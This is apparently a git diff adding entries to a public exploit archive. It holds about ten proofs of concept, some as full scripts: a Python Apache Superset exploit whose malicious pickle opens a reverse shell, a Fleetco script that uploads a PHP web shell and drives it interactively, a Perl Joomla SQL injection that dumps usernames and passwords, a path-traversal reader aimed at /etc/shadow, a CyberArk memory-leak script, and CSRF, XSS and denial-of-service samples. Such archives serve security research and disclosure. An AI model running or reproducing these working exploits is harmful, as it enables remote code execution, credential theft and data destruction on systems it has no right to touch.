diff --git a/exploits/hardware/webapps/45928.txt b/exploits/hardware/webapps/45928.txt new file mode 100644 index 000000000..324c1573f --- /dev/null +++ b/exploits/hardware/webapps/45928.txt @@ -0,0 +1,21 @@ +# Exploit Title: Rockwell Automation Allen-Bradley PowerMonitor 1000 - Cross-Site Scripting +# Date: 2018-11-27 +# Exploit Author: Luca.Chiou +# Vendor Homepage: https://www.rockwellautomation.com/ +# Version: 1408-EM3A-ENT B +# Tested on: It is a proprietary devices: https://ab.rockwellautomation.com/zh/Energy-Monitoring/1408-PowerMonitor-1000 +# CVE : N/A + +# 1. Description: +# In Rockwell Automation Allen-Bradley PowerMonitor 1000 web page, +# user can add a new user by access the /Security/Security.shtm. +# When users add a new user, the new user’s account will in the post data. +# Attackers can inject malicious XSS code in user’s account parameter of post data. +# The user’s account parameter will be stored in database, so that cause a stored XSS vulnerability. + +# 2. Proof of Concept: +# Browse http:///Security/Security.shtm +# In page Security.shtm, add a new user +# Send this post data: + +/Security/cgi-bin/security|0|0| \ No newline at end of file diff --git a/exploits/linux/dos/45934.txt b/exploits/linux/dos/45934.txt new file mode 100644 index 000000000..e8c6f8334 --- /dev/null +++ b/exploits/linux/dos/45934.txt @@ -0,0 +1,24 @@ +# Exploit Title: Budabot 4.0 - Denial of Service (PoC) +# Date: 2018-10-15 +# Exploit Author: Ryan Delaney +# Author Contact: ryan.delaney@owasp.org +# Vendor Homepage: http://budabot.com/ +# Software Link: http://budabot.com/forum/viewtopic.php?f=8&t=1413 +# Version: 0.6 -> 4.0 +# Tested on: 4.0 +# CVE: CVE-2018-19290 + +# 1. Description +# In modules/HELPBOT_MODULE in Budabot 0.6 through 4.0, lax syntax validation +# allows remote attackers to perform a command injection attack against the +# PHP daemon with a crafted command, resulting in a denial of service or +# possibly unspecified other impact. In versions before 3.0, +# modules/HELPBOT_MODULE/calc.php has the vulnerable code; in 3.0 and above, +# modules/HELPBOT_MODULE/HelpbotController.class.php has the vulnerable code. + +# 2. Proof of Concept + +Start the Budabot listener, set valid configuration options, and wait for +the chatbot to announce it's ready in-game. +Send the chatbot a private message containing "!calc 5 x 5", and the +Budabot listener will terminate. \ No newline at end of file diff --git a/exploits/linux/webapps/45929.py b/exploits/linux/webapps/45929.py new file mode 100755 index 000000000..e5c34345d --- /dev/null +++ b/exploits/linux/webapps/45929.py @@ -0,0 +1,64 @@ +# Exploit Title: PaloAlto Networks Expedition Migration Tool 1.0.106 - Information Disclosure +# Date: 2018-11-28 +# Exploit Author: paragonsec @ Critical Start +# Vendor Homepage: https://live.paloaltonetworks.com/t5/Expedition-Migration-Tool/ct-p/migration_tool +# Software Link: https://paloaltonetworks.app.box.com/s/davuvo65k727nm7feuug0d783zo6fjx8 +# Version: 1.0.106 +# Tested on: Linux +# CVE : 2018-10142 + +#!/usr/bin/env python + +import argparse +import requests +import sys +import collections + +#Colors +OKRED = '\033[91m' +OKGREEN = '\033[92m' +ENDC = '\033[0m' + +parser = argparse.ArgumentParser() +parser.add_argument("--rhost", help = "Remote Host") +parser.add_argument('--file', help = 'File to check (e.g /etc/passwd, /etc/shadow)') +args = parser.parse_args() + +# Check to ensure at least one argument has been passed +if len(sys.argv)==1: + parser.print_help(sys.stderr) + sys.exit(1) + +rhost = args.rhost +rfile = args.file + +exploit_url = "http://" + rhost + "/API/process/checkPidStatus.php" + +headers = [ + ('User-Agent','Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0'), + ('Accept', 'application/json, text/javascript, */*; q=0.01'), + ('Accept-Language', 'en-US,en;q=0.5'), + ('Accept-Encoding', 'gzip, deflate'), + ('Connection', 'close') +] + +# probably not necessary but did it anyways +headers = collections.OrderedDict(headers) + +# Setting up GET body parameters +body = "pid=/../" + rfile + +print(OKGREEN + "Author: " + ENDC + "paragonsec @ Critical Start (https://www.criticalstart.com)") +print(OKGREEN + "CVE: " + ENDC + "2018-10142") +print(OKGREEN + "Description: " + ENDC + "Information Disclosure in Expedition Migration Tool") +print(OKGREEN + "Vuln Versions: " + ENDC + "< 1.0.107\n") + +print(OKGREEN + "[+]" + ENDC + "Running exploit...") + +s = requests.Session() + +req = requests.post(exploit_url, headers=headers, data=body) +if "false" not in req.text: + print(OKGREEN + "[+]" + ENDC + "Exploit worked! " + rfile + " exists!\n") +else: + print(OKRED + "[!]" + ENDC + "File " + rfile + " does not exist!\n") \ No newline at end of file diff --git a/exploits/linux/webapps/45933.py b/exploits/linux/webapps/45933.py new file mode 100755 index 000000000..5e9571e0b --- /dev/null +++ b/exploits/linux/webapps/45933.py @@ -0,0 +1,97 @@ +# Exploit Title: Apache Superset 0.23 - Remote Code Execution +# Date: 2018-05-17 +# Exploit Author: David May (david.may@semanticbits.com) +# Vendor Homepage: https://superset.apache.org/ +# Software Link: https://github.com/apache/incubator-superset +# Version: Any before 0.23 +# Tested on: Ubuntu 18.04 +# CVE-ID: CVE-2018-8021 + +# I originally disclosed this to the Apache Superset team back in May, and the fix had already been +# in place, but not backported. As far as I know, this is the first weaponized exploit for this CVE. + +#!/usr/bin/env python + +import sys +import os +from lxml import html +import requests + +# Change these values to your TCP listener +myIP = '192.168.137.129' +myPort = '8888' +# Credentials must belong to user with 'can Import Dashboards on Superset' privilege +username = 'test' +password = 'test' + +# Logic in case script arguments are not given +if len(sys.argv) < 3: + print('Verify you have started a TCP listener on the specified IP and Port to receive the reverse shell...') + print('Script Usage:') + print('./supersetrce.py ') + sys.exit() + +else: + # Script arguments + supersetIP = sys.argv[1] + supersetPort = sys.argv[2] + # Verify these URLs match your environment + login_URL = 'http://' + supersetIP + ':' + supersetPort + '/login/' + upload_URL = 'http://' + supersetIP + ':' + supersetPort + '/superset/import_dashboards' + + # Checks to see if file that we are going to write already exists in case this is run more than once + if os.path.isfile('evil.pickle'): + os.remove('evil.pickle') + + # Headers that we append to our POST requests + headers_dict = { + 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0', + 'DNT': '1', + 'Connection': 'close', + 'Upgrade-Insecure-Requests': '1', + } + + # Creates evil pickle file and writes the reverse shell to it + evilPickle = open('evil.pickle','w+') + evilPickle.write('cos\nsystem\n(S\'rm /tmp/backpipe;mknod /tmp/backpipe p;/bin/sh 0/tmp/backpipe\'\ntR.') + evilPickle.close() + + # Start a session so we have persistent cookies + session = requests.session() + + # Grabs the Login page to parse it for its CSRF token + login_page = session.get(login_URL) + if login_page.status_code != 200: + print('Login page not reached, verify URLs in script') + login_tree = html.fromstring(login_page.content) + csrf_token = login_tree.xpath('//input[@id="csrf_token"]/@value') + + # Form data that is sent in the POST request to Login page + login_data = { + 'csrf_token' : csrf_token, + 'username' : username, + 'password' : password, + } + + # Adds the Referer header for the login page + headers_dict['Referer'] = login_URL + + # Logon action + login = session.post(login_URL, headers=headers_dict, data=login_data) + + # Grabs the Upload page to parse it for its CSRF token + upload_page = session.get(upload_URL) + if upload_page.status_code != 200: + print('Upload page not reached, verify credentials and URLs in script') + upload_tree = html.fromstring(upload_page.content) + csrf_token = upload_tree.xpath('//input[@id="csrf_token"]/@value') + + # Adds the Referer header for the Upload page + headers_dict['Referer'] = upload_URL + + # Upload action + upload = session.post(upload_URL, headers=headers_dict, data={'csrf_token':csrf_token}, files={'file':('evil.pickle',open('evil.pickle','rb'),'application/octet-stream')}) + + # Closes the session + session.close() + sys.exit() \ No newline at end of file diff --git a/exploits/php/webapps/45927.py b/exploits/php/webapps/45927.py new file mode 100755 index 000000000..2528a4a2b --- /dev/null +++ b/exploits/php/webapps/45927.py @@ -0,0 +1,77 @@ +# Exploit Title: Fleetco Fleet Maintenance Management 1.2 - Remote Code Execution +# Date: 2018-11-23 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Contact: https://pentest.com.tr +# Vendor Homepage: https://www.fleetco.space +# Software Link: http://www.fleetco.space/download/215/ +# Version: v1.2 +# Category: Webapps +# Tested on: XAMPP for Linux 1.7.2 +# Software Description : Fleetco FMM is a free, web-based vehicle fleet maintenance management +# system written in PHP with MySQL database backend. +# Description : Fleetco 1.2 and lower versions allows to upload arbitrary ".php" files which +# leads to a remote command execution on the remote server. Any authorized user is enough to exploit. +# ================================================================== +# PoC: + +#!/usr/bin/python + +import mechanize +import sys +import cookielib +import requests +import colorama +from colorama import Fore + +print "\n[*] Fleetco Fleet Maintenance Management v1.2 - Remote Code Execution" +print "[*] Vulnerability discovered by AkkuS" +print "[*] My Blog - https://www.pentest.com.tr\n" +if (len(sys.argv) != 2): + print "[*] Usage: poc.py " + exit(0) + +rhost = sys.argv[1] + +# User Information Input +UserName = str(raw_input("User Name: ")) +Password = str(raw_input("Password: ")) + +# Login into site +print(Fore.BLUE + "+ [*] Loging in...") +br = mechanize.Browser() +br.set_handle_robots(False) + +# Cookie Jar +cj = cookielib.LWPCookieJar() +br.set_cookiejar(cj) + +br.open("http://"+rhost+"/login.php") +assert br.viewing_html() +br.select_form(name="form1") +br.select_form(nr=0) +br.form['username'] = UserName +br.form['password'] = Password +br.submit() + +# Where are you +title = br.title() +print (Fore.YELLOW + "+ [*] You're in "+title+" section of the app now") + +# Create Accident Records with multipart/form-data to RCE +rce_headers = {"Content-Type": "multipart/form-data; boundary=---------------------------10664657171782352435254769348"} +rce_data="-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_Fleet_1\"\r\n\r\nCargo Carriers\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_Vehicle_1\"\r\n\r\nBF1470\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_Type_1\"\r\n\r\nLorry\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_Date_1\"\r\n\r\n11/07/2018\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"type_Date_1\"\r\n\r\ndate2\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"type_Time_1\"\r\n\r\ntime\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_Driver_1\"\r\n\r\nAntony Croos\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_Details_1\"\r\n\r\ntest\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"type_Images_1\"\r\n\r\nupload2\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_Images_1\"; filename=\"RCE.php\"\r\nContent-Type: application/x-php\r\n\r\n\"; $cmd = ($_REQUEST['cmd']); system($cmd); echo \"\"; die; }?>\n\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"filename_Images_1\"\r\n\r\nRCE.php\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_EnteredBy_1\"\r\n\r\nMark Croos\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"value_SysDate_1\"\r\n\r\n2018-11-23 14:58:09\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n1\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"a\"\r\n\r\nadded\r\n-----------------------------10664657171782352435254769348\r\nContent-Disposition: form-data; name=\"rndVal\"\r\n\r\n0.8040138072331872\r\n-----------------------------10664657171782352435254769348--\r\n" + +upload = requests.post("http://"+rhost+"/accidents_add.php?submit=1&", headers=rce_headers, cookies=cj, data=rce_data) +if upload.status_code == 200: + print (Fore.GREEN + "+ [*] Shell successfully uploaded!") + +# Shell validation and exploit +while True: + shellctrl = requests.get("http://"+rhost+"/files/RCE.php") + if shellctrl.status_code == 200: + Command = str(raw_input(Fore.WHITE + "shell> ")) + URL = requests.get("http://"+rhost+"/files/RCE.php?cmd="+Command+"") + print URL.text + else: + print (Fore.RED + "+ [X] Unable to upload or access the shell") + sys.exit() \ No newline at end of file diff --git a/exploits/php/webapps/45930.pl b/exploits/php/webapps/45930.pl new file mode 100755 index 000000000..c956b7b63 --- /dev/null +++ b/exploits/php/webapps/45930.pl @@ -0,0 +1,55 @@ +# Exploit Title: Joomla! Component JE Photo Gallery 1.1 - SQL Injection +# Dork: N/A +# Date: 2018-11-26 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://joomlaextensions.co.in +# Software Link: http://joomlaextensions.co.in/download/1387375463_JE%20PhotoGallery%20(%20J-%203.0%20).zip +# Version: 1.1 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) + +#!/usr/bin/perl -w + +sub clear{ +system(($^O eq 'MSWin32') ? 'cls' : 'clear'); } +clear(); +print " + ./ + (o o) +###############################oOOo-(-)-oOOo############################### + ______ _______ ___ _ __ _____ _______ ___________ _ __ + / _/ / / / ___// | / | / / / ___// ____/ | / / ____/ | / | / / + / // /_/ /\__ \/ /| | / |/ / \__ \/ __/ / |/ / / / /| | / |/ / + _/ // __ /___/ / ___ |/ /| / ___/ / /___/ /| / /___/ ___ |/ /| / + /___/_/ /_//____/_/ |_/_/ |_/ /____/_____/_/ |_/\____/_/ |_/_/ |_/ + + WWW.IHSAN.NET + + + Joomla! Component JE Photo Gallery 1.1 - SQL Injection +############################################################################ +"; + +use LWP::UserAgent; +print "\nTarget:[http://site.com/path/]: "; +chomp(my $target=); +print "\n[!] Exploiting Progress...\n"; +print "\n"; +$UT="wizjk_users"; +$S="index.php?"; +$I="tmpl=component&option=com_jephotogallery&view=category&task=fetchimage&categoryid="; +$E="%2d%32%39%20%55%4e%69%6f%6e%20%73%65%4c%45%43%54%20%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%75%73%65%72%6e%61%6d%65%2c%30%78%33%61%2c%70%61%73%73%77%6f%72%64%29%20%46%52%4f%4d%20".$UT."%29%2c%30%2c%30%2c%30%2c%30%2c%30%2c%30%2c%30%2c%30%2c%4e%75%4c%4c%2c%30%2c%30%2d%2d%20%2d"; +$SIE = LWP::UserAgent->new() or die "Could not initialize browser\n"; +$SIE->agent('Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0'); +$host = $target . "".$S."".$I."".$E.""; +$res = $SIE->request(HTTP::Request->new(GET=>$host)); +$answer = $res->content; if ($answer =~/{"id":"(.*?)"/){ +print "[+] Success !!!\n"; +print "\n[+] Detail : $1\n"; +print "\n"; +} +else{print "\n[-]Not found.\n"; +} \ No newline at end of file diff --git a/exploits/php/webapps/45932.txt b/exploits/php/webapps/45932.txt new file mode 100644 index 000000000..97a8b9bdb --- /dev/null +++ b/exploits/php/webapps/45932.txt @@ -0,0 +1,77 @@ +# Exploit Title: PHP Server Monitor 3.3.1 - Cross-Site Request Forgery +# Exploit Author: Javier Olmedo +# Website: https://www.sidertia.com +# Date: 2018-11-28 +# Google Dork: N/A +# Vendor: https://www.phpservermonitor.org/ +# Software Link: https://github.com/phpservermon/phpservermon/releases/tag/v3.3.1 +# Affected Version: 3.3.1 and possibly before +# Patched Version: update to 3.3.2 +# Category: Web Application +# Platform: Windows & Ubuntu +# Tested on: Win10x64 & Kali Linux +# CVE: N/A +# References: +# https://github.com/phpservermon/phpservermon/issues/670 +# https://www.sidertia.com/Home/Community/Blog/2018/11/28/Corregidas-las-vulnerabilidades-CSRF-descubiertas-en-PHP-Server-Monitor + +# 1. Technical Description: +# PHP Server Monitor version 3.3.1 and possibly before are affected by multiple +# Cross-Site Request Forgery vulnerability, an attacker could remove users, logs, +# and servers. + +# 2.1 Proof Of Concept (Delete User): + +(Method 1) +Use Google URL Shortener (or similar) to shorten the next url (http://[PATH]/?&mod=user&action=delete&id=[ID]) and send it to the victim. + +(Method 2) +Use next form and send it tho the victim. + + + +
+ + + + +
+ + + +# 2.2 Proof Of Concept (Delete Server): + +(Method 1) +Use Google URL Shortener (or similar) to shorten the next url (http://[PATH]/?&mod=server&action=delete&id=[ID]) and send it to the victim. + +(Method 2) +Use next form and send it tho the victim. + + + +
+ + + + +
+ + + +# 2.3 Proof Of Concept (Delete All Logs): + +(Method 1) +Use Google URL Shortener (or similar) to shorten the next url (http://[PATH]/?&mod=server_log&action=delete) and send it to the victim. + +(Method 2) +Use next form and send it tho the victim. + + + +
+ + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/45935.txt b/exploits/php/webapps/45935.txt new file mode 100644 index 000000000..6da38b45f --- /dev/null +++ b/exploits/php/webapps/45935.txt @@ -0,0 +1,33 @@ +# Exploit Title: Wordpress Plugins Advanced-custom-fields 5.7.7 - Cross-Site Scripting +# Google Dork: N/A +# Date: 2018-12-02 +# Exploit Author: Loading Kura Kura +# Vendor Homepage: https://www.advancedcustomfields.com/] +# Software Link: https://www.advancedcustomfields.com/ +# Version: 5.7.7 +# Tested on: Win10 x64/Kali linux x64 +# CVE : N/A + +# description: +# A Stored Cross-site scripting (XSS) was discovered in wordpress plugins easy testimonials 3.2. +# Three parameters(_ikcf_client _ikcf_position _ikcf_other) have Cross-Site Scripting. + +# Paramater: acf_fields[11][label] +# PoC + +POST /wordpress/wp-admin/post.php HTTP/1.1 +Host: localhost +Content-Length: 2838 +Cache-Control: max-age=0 +Origin: http://localhost +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 +Referer: http://localhost/wordpress/wp-admin/post.php?post=8&action=edit +Accept-Encoding: gzip, deflate +Accept-Language: id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7,da;q=0.6 +Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1543850245%7CLBSY8ANOj9TKCX2YpnzKJoZ5N75oRW4ZGkZZrw5INPt%7C74dd4284fad8e2f658d13db3d669d0d61976654b4b9e7b4a820b0156fb018264; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1543850245%7CLBSY8ANOj9TKCX2YpnzKJoZ5N75oRW4ZGkZZrw5INPt%7Cd0b0455678fae203a81b5c23b42dbfa51b0ab665e33607d2b09b1d5d62cc36be; wp-settings-time-1=1543678278; wp-settings-1=mfold%3Do; hblid=gR3SowbFiR0QuMDg3m39N0I6Bo2jr38A; olfsk=olfsk8076045099904943; _gcl_au=1.1.201976856.1543314650 +Connection: close + +_wpnonce=415211ddca&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D8%26action%3Dedit%26message%3D1&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=acf-field-group&original_post_status=publish&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D8%26action%3Dedit&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D8%26action%3Dedit&post_ID=8&meta-box-order-nonce=2cc12cc441&closedpostboxesnonce=bbd0be706b&post_title=xss&samplepermalinknonce=4f1f2ec280&_acf_screen=field_group&_acf_post_id=8&_acf_nonce=191e753914&_acf_validation=0&_acf_changed=1&_acf_delete_fields=0%7C9&original_publish=Update&save=Update&acf_fields%5B11%5D%5BID%5D=11&acf_fields%5B11%5D%5Bkey%5D=field_5c02a79cc0f83&acf_fields%5B11%5D%5Bparent%5D=8&acf_fields%5B11%5D%5Bmenu_order%5D=0&acf_fields%5B11%5D%5Bsave%5D=settings&acf_fields[11][label]=%3Cscript%3Ealert%28%22loadingkurakura%22%29%3C%2Fscript%3E&acf_fields%5B11%5D%5Bname%5D=%3Cscript%3Ealert%28%22loadingkurakura1%22%29%3C%2Fscript%3E&acf_fields%5B11%5D%5Btype%5D=text&acf_fields%5B11%5D%5Binstructions%5D=&acf_fields%5B11%5D%5Brequired%5D=0&acf_fields%5B11%5D%5Brequired%5D=1&acf_fields%5B11%5D%5Bdefault_value%5D=&acf_fields%5B11%5D%5Bplaceholder%5D=&acf_fields%5B11%5D%5Bprepend%5D=&acf_fields%5B11%5D%5Bappend%5D=&acf_fields%5B11%5D%5Bmaxlength%5D=&acf_fields%5B11%5D%5Bconditional_logic%5D=0&acf_fields%5B11%5D%5Bwrapper%5D%5Bwidth%5D=&acf_fields%5B11%5D%5Bwrapper%5D%5Bclass%5D=&acf_fields%5B11%5D%5Bwrapper%5D%5Bid%5D=&acf_fields%5B10%5D%5BID%5D=10&acf_fields%5B10%5D%5Bkey%5D=field_5c02a7abc0f84&acf_fields%5B10%5D%5Bparent%5D=8&acf_fields%5B10%5D%5Bmenu_order%5D=1&acf_fields%5B10%5D%5Bsave%5D=meta&acf_fields%5B12%5D%5BID%5D=12&acf_fields%5B12%5D%5Bkey%5D=field_5c02a7abc0f84&acf_fields%5B12%5D%5Bparent%5D=8&acf_fields%5B12%5D%5Bmenu_order%5D=2&acf_fields%5B12%5D%5Bsave%5D=meta&acf_field_group%5Blocation%5D%5Bgroup_0%5D%5Brule_0%5D%5Bparam%5D=post_type&acf_field_group%5Blocation%5D%5Bgroup_0%5D%5Brule_0%5D%5Boperator%5D=%3D%3D&acf_field_group%5Blocation%5D%5Bgroup_0%5D%5Brule_0%5D%5Bvalue%5D=post&acf_field_group%5Blocation%5D%5Bgroup_0%5D%5Brule_1%5D%5Bparam%5D=post_type&acf_field_group%5Blocation%5D%5Bgroup_0%5D%5Brule_1%5D%5Boperator%5D=%3D%3D&acf_field_group%5Blocation%5D%5Bgroup_0%5D%5Brule_1%5D%5Bvalue%5D=post&acf_field_group%5Bactive%5D=0&acf_field_group%5Bactive%5D=1&acf_field_group%5Bstyle%5D=default&acf_field_group%5Bposition%5D=normal&acf_field_group%5Blabel_placement%5D=top&acf_field_group%5Binstruction_placement%5D=label&acf_field_group%5Bmenu_order%5D=0&acf_field_group%5Bdescription%5D=ddd&acf_field_group%5Bhide_on_screen%5D=&acf_field_group%5Bhide_on_screen%5D%5B%5D=the_content&acf_field_group%5Bkey%5D=group_5c02a6cfa31d6&post_name=group_5c02a6cfa31d6 \ No newline at end of file diff --git a/exploits/windows/dos/45931.txt b/exploits/windows/dos/45931.txt new file mode 100644 index 000000000..6cc1e22ac --- /dev/null +++ b/exploits/windows/dos/45931.txt @@ -0,0 +1,94 @@ +# Exploit Title: Mozilla Firefox 63.0.1 - Denial of Service (PoC) +# Date: 2018-11-29 +# Exploit Author: SAIKUMAR CHEBROLU +# Vendor Homepage: https://www.mozilla.org/en-US/firefox/new/ +# Bugzilla report: https://bugzilla.mozilla.org/show_bug.cgi?id=1504512 +# Version: Firefox 63.0.1 +# Tested on: Windows 10 +# CVE : No CVE is been assigned to this bug. + +# To exploit this vulnerability please follow the below steps. +# Firefox is being crashed, when it tried to process the chunked data. when Transfer-Encoding header +# is used, we suppose to send the data in the chunks form. When all the chunks being transferred, +# we need to tell the client with chunk length zero. so that it understands chunked stream completed. + +# But if we send the data after sending zero length, then firefox not able to understand it, +# and it being crashed. + +# Example: + +5 + +Don't + +5 + +be af + +5 + +firef + +5 + +ox is + +0 + +Crash (after saying it is end, we still sending some data) + +\r\n + +# here we are saying no chunked data after this.so that it should end with \r\n. But we +# are sending some data after this also. Like + +# Steps to reproduce the crash + +1)download the firefoxcrash.txt + +2)nc -lp 8000 < firefoxcrash.txt + +3)browe the url from firefox like http://localhost:8000 + +4)then close the netcat client. then you will obserev the firefox crash. + +# fireforcrash.txt + +HTTP/1.1 200 ok +Content-type: application/octet-stream +Content-disposition: attachment; filename="crash.txt" +Transfer-Encoding: chunked +Connection: close + +5 +I am +5 + be a +5 +fraid +5 + to l +5 +ook a +5 +t thi +5 +s mes +5 +sage. +5 + It i +5 +s com +5 +plete +5 +ly ha +5 +rmles +5 +s. Re +5 +ally! +0 +foobar \ No newline at end of file diff --git a/exploits/windows/remote/45926.py b/exploits/windows/remote/45926.py new file mode 100755 index 000000000..f64bcf576 --- /dev/null +++ b/exploits/windows/remote/45926.py @@ -0,0 +1,55 @@ +# Exploit Title: CyberArk 9.7 - Memory Disclosure +# Date: 2018-06-04 +# Exploit Author: Thomas Zuk (@Freakazoidile) +# Vendor Homepage: https://www.cyberark.com/products/privileged-account-security-solution/enterprise-password-vault/ +# Version: < 9.7 and < 10 +# Tested on: Windows 2008, Windows 2012, Windows 7, Windows 8, Windows 10 +# CVE: CVE-2018-9842 + +# Description: There currently exists a general advisory for the CVE with a description of exploitation and how +# to reproduce, but without full exploit code. I have developed a working, reliable standalone Python exploit that +# can be successfully used by modifying only the target IP address. Attached to this email submission is the working exploit code. + +#!/usr/bin/python + +import socket +import os +import sys + +# Exploit script for CVE-2018-9842 +# Original vulnerability advisory: https://www.redteam-pentesting.de/advisories/rt-sa-2017-015 +# Author: Thomas Zuk (@Freakazoidile) - Security Consultant @ Packetlabs ltd. + +# Linux cmd line manual test: cat logon.bin | nc -vv IP 1858 | xxd +# paste the following bytes into a hexedited file named logon.bin: +#fffffffff7000000ffffffff3d0100005061636c695363726970745573657200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020202020ffffffff0000000000000000000073000000cececece00000000000000000000000000000000303d4c6f676f6efd3131353d372e32302e39302e3238fd36393d50fd3131363d30fd3130303dfd3231373d59fd3231383d5041434c49fd3231393dfd3331373d30fd3335373d30fd32323d5061636c6953637269707455736572fd3336373d3330fd0000 +# +# + +ip = "10.107.32.21" +port = 1858 + +# Cyber Ark port 1858 is a proprietary software and protocol to perform login and administrative services. +# The below is a sample login request that is needed to receive the memory + +pacli_logon = "\xff\xff\xff\xff\xf7\x00\x00\x00\xff\xff\xff\xff\x3d\x01\x00\x00\x50\x61\x63\x6c\x69\x53\x63\x72\x69\x70\x74\x55\x73\x65\x72\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x20\x20\x20\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x73\x00\x00\x00\xce\xce\xce\xce\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x30\x3d\x4c\x6f\x67\x6f\x6e\xfd\x31\x31\x35\x3d\x37\x2e\x32\x30\x2e\x39\x30\x2e\x32\x38\xfd\x36\x39\x3d\x50\xfd\x31\x31\x36\x3d\x30\xfd\x31\x30\x30\x3d\xfd\x32\x31\x37\x3d\x59\xfd\x32\x31\x38\x3d\x50\x41\x43\x4c\x49\xfd\x32\x31\x39\x3d\xfd\x33\x31\x37\x3d\x30\xfd\x33\x35\x37\x3d\x30\xfd\x32\x32\x3d\x50\x61\x63\x6c\x69\x53\x63\x72\x69\x70\x74\x55\x73\x65\x72\xfd\x33\x36\x37\x3d\x33\x30\xfd\x00\x00" + + +for iteration in range(0, 110): + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((ip, port)) + s.send(pacli_logon) + + # recieve response + s.recv(200) + reply = s.recv(1500) + + # write responses to file + file = open("cyberark_memory", "a") + + file.write("received: \n") + file.write(reply) + file.write("\n\n\n") + file.close() + + s.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index e6a134bfc..36e7b844e 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6202,6 +6202,8 @@ id,file,description,date,author,type,platform,port 45919,exploits/linux/dos/45919.c,"Linux Kernel 4.8 (Ubuntu 16.04) - Leak sctp Kernel Pointer",2018-11-30,"Jinbum Park",dos,linux, 45923,exploits/windows/dos/45923.html,"VBScript - 'OLEAUT32!VariantClear' and 'scrrun!VBADictionary::put_Item' Use-After-Free",2018-11-30,"Google Security Research",dos,windows, 45924,exploits/windows/dos/45924.html,"VBScript - 'rtFilter' Out-of-Bounds Read",2018-11-30,"Google Security Research",dos,windows, +45931,exploits/windows/dos/45931.txt,"Mozilla Firefox 63.0.1 - Denial of Service (PoC)",2018-12-03,"SAIKUMAR CHEBROLU",dos,windows, +45934,exploits/linux/dos/45934.txt,"Budabot 4.0 - Denial of Service (PoC)",2018-12-03,"Ryan Delaney",dos,linux, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -16984,6 +16986,7 @@ id,file,description,date,author,type,platform,port 45914,exploits/linux/remote/45914.rb,"PHP imap_open - Remote Code Execution (Metasploit)",2018-11-29,Metasploit,remote,linux, 45917,exploits/multiple/remote/45917.rb,"TeamCity Agent - XML-RPC Command Execution (Metasploit)",2018-11-29,Metasploit,remote,multiple, 45925,exploits/java/remote/45925.rb,"Apache Spark - Unauthenticated Command Execution (Metasploit)",2018-11-30,Metasploit,remote,java,6066 +45926,exploits/windows/remote/45926.py,"CyberArk 9.7 - Memory Disclosure",2018-12-03,"Thomas Zuk",remote,windows,1858 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell 